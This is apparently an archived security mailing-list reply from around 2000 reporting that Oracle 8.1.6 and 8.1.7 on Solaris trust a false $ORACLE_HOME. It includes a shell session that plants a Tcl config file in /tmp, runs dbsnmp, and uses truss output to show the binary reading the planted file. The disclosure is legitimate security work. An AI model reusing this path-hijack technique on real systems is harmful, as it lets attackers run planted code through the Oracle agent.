> Ismael Briones wrote:
> Oracle-8.1.6 is not vulnerable

This was an issue that existed with 8.0.5 and maybe even
before that. I had drafted a report on this on 6/22/2000
for in house reference. I have found that the following:

        TESTED ON SPARC/solaris 2.7
        ===========================
> oracle-8.1.6 -> affected
> oracle-8.1.7 -> affected

are also susceptible to false $ORACLE_HOME values.

<-------------------------- snip -------------------------->
schoehost $ echo $ORACLE_HOME
/usr/app/oracle/product/8.1.6

schoehost $ unsetenv $ORACLE_HOME; /usr/oracle/product/8.1.6/bin/dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462
Failed to initialize nl component,error=462

schoehost $ unsetenv ORACLE_HOME
schoehost $ mkdir -p /tmp/network/agent/config
schoehost $ setenv ORACLE_HOME "/tmp"
schoehost $ echo "return \$ORACLE_HOME" > /tmp/network/agent/config/nmiconf.tcl
schoehost $ chmod +x /tmp/network/agent/config/nmiconf.tcl
schoehost $ truss -fae /usr/oracle/product/8.1.6/bin/dbsnmp
...
3773: lstat64("/home", 0xFFBEE0F0) = 0
3773: lstat64("/home/..", 0xFFBEE0F0) = 0
3773: llseek(8, 0xFFFFFFFFFFFFFCFF, SEEK_CUR) = 276
3773: close(8) = 0
3773: close(7) = 0
3773: chdir("/tmp/network/agent/config") = 0
...
4509: close(7) = 0
4509: stat("/tmp/network/agent/config/nmiconf.tcl", 0xFFBEE93C) = 0
4509: open("/tmp/network/agent/config/nmiconf.tcl", O_RDONLY) = 7
4509: read(7, " r e t u r n $ O R A C".., 4096) = 20
4509: close(7) = 0
...
<-------------------------- snap -------------------------->

+--------------------------------------------------+
| Sung J. Choe / UNIX Admin / www.CheapTickets.com |
| |
| Ph: 808/945.7439 Fax: 808/946.5993 |
:--------------------------------------------------+

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]